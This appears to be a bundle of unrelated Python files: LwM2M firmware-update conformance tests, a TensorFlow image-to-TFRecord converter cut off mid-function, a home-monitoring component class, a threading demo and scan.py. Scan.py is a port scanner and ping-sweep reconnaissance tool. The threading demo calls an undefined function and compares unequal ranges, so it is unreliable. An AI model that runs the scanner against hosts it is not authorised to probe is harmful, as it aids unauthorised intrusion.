# through a WRITE operation of an URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write(ResPath.FirmwareUpdate.Package, b'A' * 1024,
format=coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 3. The Server sends repeated READs or OBSERVE on State and Update
# Result Resources (CoAP GET /5/0) of the FW Update Object
# Instance to determine when the download is completed or if an error
# occured. The Download cannot be finished since the firmware
# package type is not supported by the Client
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
#
# C. In test step 3., the State Resource value set to "1" retrieved from
# successive Server READs or Client NOTIFY messages, indicates the
# Package Delivery process is in Downloading stage
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "6" indicating an error occurred during the downloading
# process related to the firmware package type not supported by the
# Client.
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "1" (Downloading) and
# Update Result Resource with value "6 indicates the firmware Package
# Delivery aborted due to a firmware package type not supported by the
# Client.
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'6', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class FirmwareUpdate_ErrorCase_UnsupportedPackageType_PackageURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
super().setUp(b'A' * 1024)
def runTest(self):
# Test 777, but with Package URI
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
self.test_write(ResPath.FirmwareUpdate.PackageURI, self.get_firmware_uri())
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual(b'6', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test778_FirmwareUpdate_ErrorCase_InvalidURI(FirmwareUpdate.Test):
def runTest(self):
# 1. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. In test step 1, the Server receives the status code "2.05 " (Content) for
# the READ success command, along with the State Resource value of
# "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 2. The Server initiates a firmware package delivery to the Client through
# a WRITE operation of an invalid URI in the Package URI Resource.
#
# B. In test step 2., the Server receives the status code "2.04" (Changed)
# for the WRITE command setting the Package URI Resource
self.test_write(ResPath.FirmwareUpdate.PackageURI,
'http://mylovelyfwserver/')
# 3. The Server sends repeated READs or OBSERVE on State and Update
# Result Resources (CoAP GET /5/0) of the FW Update Object
# Instance to determine when the download is completed or if an error
# occured. The download process is stopped by the Client due to the
# usage of a bad URI.
# 4. When the Package delivery is stopped the server READs Update
# Result to know the result of the firmware update procedure.
# C. In test step 3., the State Resource value set to "1" retrieved from
# successive Server READs or Client NOTIFY messages, indicates the
# Package Delivery process is maintained in Downloading stage
# D. In test step 3., the Update Result Resource (/5/0/5) retrieved from
# successive Server READs or Client NOTIFY messages will take the
# value "7" indicating an error occurred during the downloading
# process related to the usage of a bad URI
# E. In test step 4., the success READ message(s) (status code "2.05"
# Content) on State Resource with value "0" (Idle) and Update Result
# Resource with value "7" indicates the firmware Package Delivery
# aborted due to the connection to an Invalid URI for the firmware
# package delivery.
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'0')
self.assertEqual(b'0', observed_values[-1])
# TODO? client does not report "Downloading" state
# self.assertEqual({b'0', b'1'}, set(observed_values))
self.assertEqual({b'0'}, set(observed_values))
self.assertEqual(b'7', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
class Test779_FirmwareUpdate_ErrorCase_UnsuccessfulFirmwareUpdate(FirmwareUpdate.Test):
def runTest(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
payload = f.read()
prev_version = self.test_read(ResPath.Device.FirmwareVersion)
# 1. Step 1 โ Package Delivery
# a. The Server verifies through a READ (CoAP GET) command on
# /5/0/3 (State) the FW Update Object Instance of the Client is in Idle
# State
#
# A. Package Delivery
# a. In test step 1.a, the Server receives the status code "2.05 " (Content)
# for the READ success command, along with the State Resource value
# of "0" (Idle)
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.State))
# 1. Step 1 โ Package Delivery
# b. The Server retrieves (CoAP GET) the initial value of the Firmware
# Version Resource from the Object Device Instance for verification in
# the Pass Criteria (C)
#
# A. Package Delivery
# b. In test step 1.b, the Server receives the status code "2.05 " (Content)
# for the READ success command, along with the initial value of the
# Firmware version Resource available from the Object Device
# Instance.
prev_version = self.test_read(ResPath.Device.FirmwareVersion)
# 1. Step 1 โ Package Delivery
# c. The Server delivers the firmware package to the Client either
# through a WRITE (CoAP PUT) operation in the Package Resource
# (/5/0/0 ) or through a WRITE operation of an URI in the Package URI
# Resource.
#
# A. Package Delivery
# c. In test step 1.c, the Server receives the status code "2.04" (Changed)
# for the WRITE command setting either the Package URI Resource or
# setting the Package Resource, according to the chosen firmware
# delivery method.
self.test_write_block(ResPath.FirmwareUpdate.Package,
make_firmware_package(payload, force_error=FirmwareUpdateForcedError.FailedUpdate),
coap.ContentFormat.APPLICATION_OCTET_STREAM)
# 1. Step 1 โ Package Delivery
# d. Polling ( successive READ commands) or Notification on Update
# Result and State Resources is performed, up to the time State
# Resource takes the โDownloadedโ value (2)
#
# A. Package Delivery
# d. In at this end of test step 1.d, the State Resource take the value "2"
# (Downloaded)
self.assertEqual(b'2', self.test_read(ResPath.FirmwareUpdate.State))
# 2. Step 2 โ Installation Failure
# a. When the download is completed (State Resource value is โ2โ
# Downloaded) , the Server initiates a firmware update by triggering
# EXECUTE command on Update Resource (CoAP POST /5/0/2 )
#
# B. Installation failure
# a. In test step 2.a, the Server receives a success message "2.04"
# (Changed) in response to the EXECUTE command
self.test_execute(ResPath.FirmwareUpdate.Update)
# 2. Step 2 โ Installation Failure
# b. Polling (READ command) or Notification on Update Result and
# State Resources is performed, up to the time State Resource is
# turned back to 2 (Downloaded) or the Update Result Resource
# contains the value "8" (Firmware update failed )
#
# B. Installation failure
# b. In test step 2.b, the Server receives success message(s) "2.05"
# Contents along with a State Resource value of "3" (Updating) or "2"
# (Downloaded) and an Update Ressource value of "0" (Initial Value)
# and "8" at the end (Firmware updated failure)
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'2')
self.assertEqual(b'2', observed_values[-1])
# state == 3 may or may not not be observed
self.assertTrue(set(observed_values).issubset({b'2', b'3'}))
self.assertEqual(b'8', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 3. Step 3 โ Process Verification
# a. The server READs Update Result & State Resources to know the
# result of the firmware update procedure.
#
# C. Process Verification
# a. In test step 3.a, the Server receives success message(s) "2.05"
# Content" along with a State Resource value of "2" (Downloaded) and
# an Update Ressource value of "8" (Firmware updated failed)
self.assertEqual(b'2', self.test_read(ResPath.FirmwareUpdate.State))
self.assertEqual(b'8', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
# 3. Step 3 โ Process Verification
# b. The Server READs the Firmware Version Resource from the
# Object Device Instance
#
# C. Process Verification
# b. In test step 3.b the Server receives success message(s) "2.05" Content"
# along with a Firmware Version Resource value form the Object
# Device Instance which has not changed compared to the one retrieved
# in Pass Criteria A.b
self.assertEqual(prev_version, self.test_read(ResPath.Device.FirmwareVersion))
class FirmwareUpdate_ErrorCase_UnsuccessfulFirmwareUpdate_PackageURI(FirmwareUpdateWithHttpServer.Test):
def setUp(self):
demo_executable = os.path.join(self.config.demo_path, self.config.demo_cmd)
with open(demo_executable, 'rb') as f:
pkg = make_firmware_package(f.read(), force_error=FirmwareUpdateForcedError.FailedUpdate)
super().setUp(pkg)
def runTest(self):
# Test 777, but with Package URI
self.assertEqual(b'0', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
prev_version = self.test_read(ResPath.Device.FirmwareVersion)
self.test_write(ResPath.FirmwareUpdate.PackageURI, self.get_firmware_uri())
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'2')
self.assertEqual(b'2', observed_values[-1])
self.assertEqual({b'1', b'2'}, set(observed_values))
req = Lwm2mExecute(ResPath.FirmwareUpdate.Update)
self.serv.send(req)
self.assertMsgEqual(Lwm2mChanged.matching(req)(),
self.serv.recv())
observed_values = self.collect_values(ResPath.FirmwareUpdate.State, b'2')
self.assertEqual(b'2', observed_values[-1])
# state == 3 may or may not not be observed
self.assertTrue(set(observed_values).issubset({b'2', b'3'}))
self.assertEqual(b'8', self.test_read(ResPath.FirmwareUpdate.UpdateResult))
self.assertEqual(prev_version, self.test_read(ResPath.Device.FirmwareVersion))
|
scan.py | #!/usr/bin/env python3
#import curses #for console interface...soon
from socket import *
import time
import os
import multiprocessing
import subprocess
import csv
from datetime import datetime
def check_history():
try:
with open('session.csv','rb') as f:
reader=csv.reader(f)
except:
with open('session.csv','a', newline='') as csvfile:
filewriter = csv.writer(csvfile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
currentDate = datetime.now()
filewriter.writerow([currentDate])
def show_history():
try:
with open('session.csv') as f:
reader = csv.reader(f)
for row in reader:
print(row)
except:
pass
def write_history(action, data):
with open('session.csv','a', newline='') as csvfile:
filewriter = csv.writer(csvfile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
currentDate = datetime.now()
data1 = action
data2 = data
filewriter.writerow([data1, data2])
def socket_Scan(targetIP, write_history):
dt = datetime.now()
timer = time.time()
host = gethostbyname(targetIP)
action = '-------------------Port Scan--------------------- \n'
write_history(action,dt)
print('Scanning...')
for i in range(0, 65535):
soc = socket(AF_INET, SOCK_STREAM)
connect = soc.connect_ex((host, i))
if(connect == 0):
print('Port %d: ->[OPEN]'%(i,))
data = 'Port %d: ->[OPEN]}'%(i,)
soc.close()
write_history('', data)
time_taken = time.time() - timer
write_history('time taken =',time_taken)
print('time taken = ', time_taken)
def ping_Sweep(job_q, results_q):
DEVNULL = open(os.devnull, 'w')
while True:
ip = job_q.get()
if ip is None:
break
try:
subprocess.check_call(['ping','-c1',ip],
stdout = DEVNULL)
results_q.put(ip)
except:
pass
def menu():
print("""
|\ o
| \ o
|\ / .\ o
| | ( ======[finding-PORTy v1.]======
|/ \ /
| /
|/
""")
print('\n')
print('===[OPTIONS]=== \n [1] Scan Open Ports \n [2] Ping Sweep Live Host (Loud) \n [3] TCP Scan (Stealth) \n [4] Show Activities \n [5] Remove History \n [0] Exit')
while(True):
action = input('Action: ')
if(action == '1'):
targetIP = input('===[Scan Open Ports]=== \n Enter IP: ')
check_history()
socket_Scan(targetIP, write_history)
elif(action == '2'):
check_history()
action = '-------------------Ping Sweep Live Host--------------------- \n'
data = 'Scanning'
write_history(action, data)
size = int(input('===[Ping Sweep Live Host]=== \n Enter Range(1 to ?): '))
targetNetwork = input('\n Enter Network IP: ')
splitIP = targetNetwork.split('.')
x = '.'
reconIP = size + 1
jobs = multiprocessing.Queue()
results = multiprocessing.Queue()
pool = [multiprocessing.Process(target=ping_Sweep, args=(jobs, results))
for i in range(size) ]
for p in pool:
p.start()
for i in range(1,size):
fnetwork = splitIP[0] + x + splitIP[1] + x + splitIP[2] + x + str(i) #tricky hack on splitting ip
jobs.put(fnetwork)
for p in pool:
jobs.put(None)
for p in pool:
p.join()
while not results.empty():
liveIP = results.get()
data = liveIP,'---> we got a live one!'
dateTime = datetime.now()
write_history(dateTime, data)
print(liveIP, '---> we got a live one!')
elif(action == '3'):
print('will add soon...')
elif(action == '4'):
show_history()
elif(action == '5'):
print('will add soon...')
elif(action == '0'):
exit(0)
else:
print('incorrect option...')
if __name__ == '__main__':
menu()
|
addHugeRange_single_vs_multi.py | import threading
import time
def add(r):
global result
res = 0
for i in r:
res += i
result += res
threadName = threading.current_thread().name
#################################################
# Sequential Processing:
#################################################
t = time.time()
result = 0
worker(range(500_000))
worker(range(500_000,1_000_000))
print("Sequential Processing result: ", result)
print("Sequential Processing took:",time.time() - t,"\n")
#################################################
# Multithreaded Processing:
#################################################
t = time.time()
result = 0
#create threads
tr1 = threading.Thread(name="tr1", target=add, args=(range(50_000_00),))
tr2 = threading.Thread(name="tr2", target=add, args=(range(50_000_00,100_000_00),))
# start threads
tr1.start(); tr2.start()
# wait threads to finish their job
tr1.join(); tr2.join()
print("Multithreaded Processing result: ", result)
print("Multithreaded Processing took:",time.time() - t,"\n") |
Component.py | """
Home-Monitor:
AI system for the detection of anomalous and possibly harmful events for people.
Written by Gabriel Rojas - 2019
Copyright (c) 2019 G0 S.A.S.
See LICENSE file for details
Class information:
Class to represent any extensible component
"""
import sys
from os.path import normpath
from multiprocessing import Process
import abc
import hashlib
import Misc
from DataPool import SourceTypes, LogTypes, Messages, Data, Binnacle, CommPool
class Component():
""" Class to represent any extensible component """
ME_NAME:str = None
ME_TYPE:SourceTypes = None
ME_PATH:str = None
ME_CONFIG = None
ME_CONFIG_PATH:str = None
ME_FILE_CLASS:str = None
ME_CLASS_NAME:str = None
ME_ENABLED:bool = False
ME_LOADED:bool = False
ME_STANDALONE:bool = False
CP:CommPool = None
BC:Binnacle = Binnacle()
Check:str = '' # Hash of config file
Thread:Process = None # Thread of compoment executing
Running:bool = False # Shows if component is executing
Simulating:bool = False # Flag to control if data is simulated from a file
SimulatingPath:str = None # Path to simulating file
loggingLevel:LogTypes = LogTypes.INFO # Level of logging
def __init__(self, path="./", cp:CommPool=None):
""" Build a new component un memory """
self.ME_PATH = path
self.CP = cp
def init_standalone(self, path="./", config=None):
""" Start the component isolated of system """
self.ME_PATH = path # Path of current component
self.ME_STANDALONE = True
if not Misc.existsFile("config.yaml", self.ME_PATH):
raise ValueError(Messages.config_no_file)
self.ME_CONFIG_PATH = normpath(self.ME_PATH + "/config.yaml")
self.ME_CONFIG = Misc.readConfig(self.ME_CONFIG_PATH) if config == None else config
self.CP = CommPool(self.ME_CONFIG, standAlone=True)
self.load()
def load(self, forceLoad:bool=False):
""" Loads the component """
self.ME_LOADED = False
try:
if not Misc.existsFile("config.yaml", self.ME_PATH):
raise ValueError(Messages.config_no_file)
self.ME_CONFIG_PATH = normpath(self.ME_PATH + "/config.yaml")
self.ME_CONFIG = Misc.readConfig(self.ME_CONFIG_PATH)
new_check = hashlib.md5(str(self.ME_CONFIG).encode('utf-8')).hexdigest()
if new_check == self.Check:
return
self.Check = new_check
self.log(Messages.comp_try_start.format(self.ME_PATH), LogTypes.INFO)
self.ME_NAME = Misc.hasKey(self.ME_CONFIG, 'NAME', self.ME_PATH)
self.ME_TYPE = SourceTypes.parse(Misc.hasKey(self.ME_CONFIG, 'TYPE', None))
self.ME_ENABLED = Misc.toBool(Misc.hasKey(self.ME_CONFIG, 'ENABLED', 'False'))
if self.Thread != None:
self.Thread.terminate()
self.Thread = None
self.log(Messages.comp_change.format(self.ME_PATH, ('reload' if self.ME_ENABLED else 'stoped')), LogTypes.INFO)
if not self.ME_ENABLED:
return
self.ME_FILE_CLASS = Misc.hasKey(self.ME_CONFIG, 'FILE_CLASS', None)
if self.ME_FILE_CLASS == None:
raise ValueError(Messages.error_file_class)
self.ME_CLASS_NAME = Misc.hasKey(self.ME_CONFIG, 'CLASS_NAME', None)
if self.ME_CLASS_NAME == None:
raise ValueError(Messages.error_class_name)
self.Simulating = Misc.toBool(Misc.hasKey(self.ME_CONFIG, 'SIMULATING', 'False'))
self.SimulatingPath = Misc.hasKey(self.ME_CONFIG, 'SIMULATING_PATH', '')
if self.Simulating:
self.setSimulatedMode(self.Simulating, self.SimulatingPath)
_cls = Misc.importModule(self.ME_PATH, self.ME_FILE_CLASS, self.ME_CLASS_NAME)
obj = _cls()
obj.ME_NAME = self.ME_NAME
obj.ME_TYPE = self.ME_TYPE
obj.ME_PATH = self.ME_PATH
obj.ME_CONFIG = self.ME_CONFIG
obj.ME_CONFIG_PATH = self.ME_CONFIG_PATH
obj.ME_FILE_CLASS = self.ME_FILE_CLASS
obj.ME_CLASS_NAME = self.ME_CLASS_NAME
obj.ME_ENABLED = self.ME_ENABLED
obj.ME_LOADED = True
obj.ME_STANDALONE = self.ME_STANDALONE
obj.CP = self.CP
obj.BC = self.BC
obj.Check = self.Check
obj.Running = self.Running
obj.Simulating = self.Simulating
obj.SimulatingPath = self.SimulatingPath
obj.loggingLevel = self.loggingLevel
DeviceControllerThread = Process(target=obj.start, args=())
DeviceControllerThread.start()
self.Thread = DeviceControllerThread
del _cls, obj
self.ME_LOADED = True
self.log(Messages.comp_started.format(self.ME_NAME), LogTypes.INFO)
print(self.ME_NAME, 'loaded.')
except:
self.log(Messages.comp_load_error, LogTypes.ERROR)
def checkConnection(self):
""" Verify connection with pool """
return self.CP.isLive()
def log(self, msg:str, logType:LogTypes, item:str=''):
""" Allows send message to Binnacle """
dataLog = Data()
dataLog.source_type = self.ME_TYPE
dataLog.source_name = self.ME_NAME
dataLog.source_item = item
dataLog.data = '{}'.format(msg)
dataLog.aux = self.__class__.__name__
if logType.value > LogTypes.WARNING.value:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = exc_tb.tb_frame.f_code.co_filename
dataLog.data += ' == {} :: {} :: {} :: {}'.format(exc_obj, exc_type, fname, exc_tb.tb_lineno)
self.BC.logFromComponent(dataLog, logType)
if not self.ME_STANDALONE:
self.CP.logFromComponent(dataLog, logType)
def setLoggingSettings(self, loggingLevel:LogTypes=LogTypes.INFO, loggingFile=None, loggingFormat=None):
""" set logging configurations """
self.loggingLevel = loggingLevel
self.BC.loggingSettings(loggingLevel, loggingFile, loggingFormat)
def setSimulatedMode(self, simulate:bool, path:str):
""" Set if the capturing is simulated """
self.Simulating = simulate
self.SimulatingPath = path
self.log(Messages.comp_setSimulateMode.format(self.ME_NAME, str(simulate)), LogTypes.INFO)
@abc.abstractmethod
def start(self):
""" Implement me! :: Do anything necessary for start a component. """
raise ValueError('Implement me! :: Do anything necessary for start a component.')
def stop(self):
""" Stop module and getting data """
self.Running = False
self.log(Messages.comp_stop.format(self.ME_NAME), LogTypes.WARNING)
def send(self, data:Data):
""" Send data to pool """
self.CP.send(data)
def receive(self, dataFilter:Data, limit:int=-1, lastTime:float=-1):
""" Returns a list objects type Data from pool """
if self.Simulating:
return self.simulateData(dataFilter, limit, lastTime)
else:
return self.CP.receive(dataFilter, limit=limit, lastTime=lastTime)
@abc.abstractmethod
def showData(self, data:Data):
""" Implement me! :: To show data if this module start standalone.
Call init_standalone before start. """
raise ValueError('Implement me! :: To show data if this module start standalone. Call init_standalone before start.')
@abc.abstractmethod
def simulateData(self, dataFilter:Data, limit:int=-1, lastTime:float=-1):
""" Implement me! :: Allows to simulate data if this module start standalone.
Call init_standalone before start. """
raise ValueError('Implement me! :: Allows to simulate data if this module start standalone. Call init_standalone before start.')
|
build_image_data.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If you data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'r') as f:
image_data = f.read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected eror while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
